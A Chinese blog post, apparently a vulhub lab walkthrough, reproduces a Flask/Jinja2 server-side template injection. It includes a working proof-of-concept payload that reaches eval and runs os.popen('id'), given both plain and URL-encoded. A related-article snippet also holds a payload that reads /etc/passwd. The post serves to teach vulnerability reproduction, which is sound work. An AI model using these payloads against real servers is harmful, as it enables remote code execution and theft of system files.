服务端模板注入(SSTI)漏洞

最新推荐文章于 2023-09-23 21:22:41 发布
最新推荐文章于 2023-09-23 21:22:41 发布
阅读量288 收藏
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Snowflake1997/article/details/123568890
版权

首先进入漏洞环境

构造所需漏洞

docker-compose up -d

在浏览器中访问

http://your-ip/?name={{233*233}}

获取eval函数并执行任意python代码的POC

{% for c in [].__class__.__base__.__subclasses__() %}

{% if c.__name__ == 'catch_warnings' %}

  {% for b in c.__init__.__globals__.values() %}

  {% if b.__class__ == {}.__class__ %}

    {% if 'eval' in b.keys() %}

      {{ b['eval']('__import__("os").popen("id").read()') }}

    {% endif %}

  {% endif %}

  {% endfor %}

{% endif %}

{% endfor %}

访问

http://your-ip:8000/?name=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values()%20%25%7D%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys()%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D(%27__import__(%22os%22).popen(%22id%22).read()%27)%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D

得到执行结果:

冰 雪
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
服务端模板注入攻击 (SSTI
pmt123456的博客
11-17 501
1、题目:Web_python_template_injection 从零学习flask模板注入 关于python魔术方法payload:"".__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read() 的解释 题解1:CTF引出对Python模板注入的思考 #找到os模块 #有两个 #我们要找的是第71个<class 'site._Printer'> num = 0 for n in ''.__class__.__m
vulhub学习(3) flask-ssti 漏洞复现
yukinorong的博客
06-24 2186
环境准备 漏洞环境选择vulhub , 如上述配置 进入flask/ssti 打开docker环境 这里可以看见环境启动成功 由于我的vulhub配置在虚拟机上,不能直接用127访问。 打开命令行 ifconfig,找到ip 192.x docker 启动环境会另外配置端口,利用docker ps查询。发现是8000 漏洞原理 利用浏览器访问可以看见页面 查看源码 可以看到核心语句为 t = Template("hello " + name) 此处,函数利用get获取参数进入template
Flask(Jinja2) 服务端模板注入漏洞
浅笑996的博客
12-11 1296
原理 参考文章: https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf http://rickgray.me/use-python-features-to-execute-arbitrary-codes-i...
Vulnhub flask(SSTI漏洞复现
最新发布
qq_69209270的博客
09-23 289
Vulnhub flask(SSTI漏洞复现
Vulhub Flask SSTI漏洞复现
CyhDl666的博客
03-26 974
文章目录环境搭建漏洞复现python3python2CTFSHOWWEB361WEB362WEB363 环境搭建 首先利用docker搭建好环境 docker-compose up -d docker ps查看搭建的端口:8000 漏洞复现 开始复现 flask-ssti漏洞以前有总结过 整理的不够好 今天重新整理一下 题目源码 from flask import Flask, request from jinja2 import Template app = Flask(__name__)
vulhub漏洞复现十五_flask
weixin_44193247的博客
01-26 1282
vulhub漏洞复现练习篇
Flask(Jinja2)服务端模板注入漏洞——vulhub/flack/ssti
Stephen Wolf
10-31 1508
一、服务端模板注入漏洞 简述: 服务器模板注入 (SSTI ) 是一种利用公共 Web 框架的服务器端模板作为攻击媒介的攻击方式,该攻击利用了嵌入模板的用户输入方式的弱点。SSTI 攻击可以用来找出 Web 应用程序的内容结构。 二、利用搭的vulhub靶机漏洞复现 1、service docker start //进入虚拟机后开启docker服...
Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf
11-30
1. **Detect**(检测):识别可能存在的模板注入漏洞,通过分析应用程序的输入和输出模式来发现不安全的用户输入处理。 2. **Identify**(识别):确定模板引擎类型和版本,这对于了解可能的exploit和潜在的漏洞至关...
ssti-payloads::bullseye:服务器端模板注入有效负载
04-13
服务器端模板注入漏洞可能使网站遭受各种攻击,具体取决于所讨论的模板引擎以及应用程序使用它的方式。 在某些罕见情况下,这些漏洞不会带来真正的安全风险。 但是,在大多数情况下,服务器端模板注入的影响可能是...
SSTI漏洞学习(下)——Flask_Jinja模板引擎的相关绕过 .pdf
09-05
例如,攻击者可能会使用以下模板注入payload来寻找可利用的函数: ```python {{ ''.__class__.__mro__[2].__subclasses__()[index].__init__.__globals__['__builtins__']['file']('path/to/file') }} ``` 在这个...
gentlexue#POC-3#Apache OfBiz 服务器端模板注入SSTI)1
07-25
Apache OfBiz 服务器端模板注入SSTIApache OfBiz 17.12.01容易受到服务器端模板注入SSTI)的影响,从而导致远程代码执行
tplmap.zip
07-26
模板注入通常发生在应用使用模板引擎解析用户输入时,没有对输入数据进行充分的验证和过滤。这些模板引擎如Jinja2、Smarty、FreeMarker等,在处理动态内容时,如果直接将未经处理的用户输入嵌入到模板中,就可能导致...
SSTI---总结
wwwwyyyrre的博客
06-12 2306
1)过滤[]和.只过滤[]pop() 函数用于移除列表中的一个元素(默认最后一个元素),并且返回该元素的值。若.也被过滤,使用原生JinJa2函数|attr()将request.__class__改成request|attr("__class__")(2)过滤_利用request.args属性将其中的request.args改为request.values则利用post的方式进行传参(3)关键字过滤base64编码绕过__getattribute__使用实例访问属性时,调用该方法。
flask 起服务 、访问
weixin_41642203的博客
10-28 445
【代码】flask 起服务 、访问。
解读2017-08-10发布的几个安全漏洞
weixin_34268579的博客
08-20 388
标签 PostgreSQL , 安全漏洞 , CVE-2017-7546 , CVE-2017-7547 , CVE-2017-7548 背景 PostgreSQL 社区于08-10发布了新版本,修复了三个安全漏洞。 https://www.postgresql.org/about/news/1772/ CVE-2017-7546: Empty...
Flask(Jinja2)服务端模板注入漏洞SSTI)整理
qq_46145027的博客
04-19 1283
整理一下Flask框架下的SSTI漏洞相关知识
渗透技术学习之二--docker搭建vulhub靶场进行nginx服务漏洞分析
阿党的专栏
03-09 1339
docker搭建vulhub靶场进行nginx服务漏洞分析
利用Vulnhub复现漏洞 - Flask(Jinja2) 服务端模板注入漏洞
JiangBuLiu的博客
07-08 1114
Flask(Jinja2) 服务端模板注入漏洞Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现 Vulnhub官方复现教程 https://vulhub.org/#/environments/flask/ssti/ 漏洞原理 https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-In...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值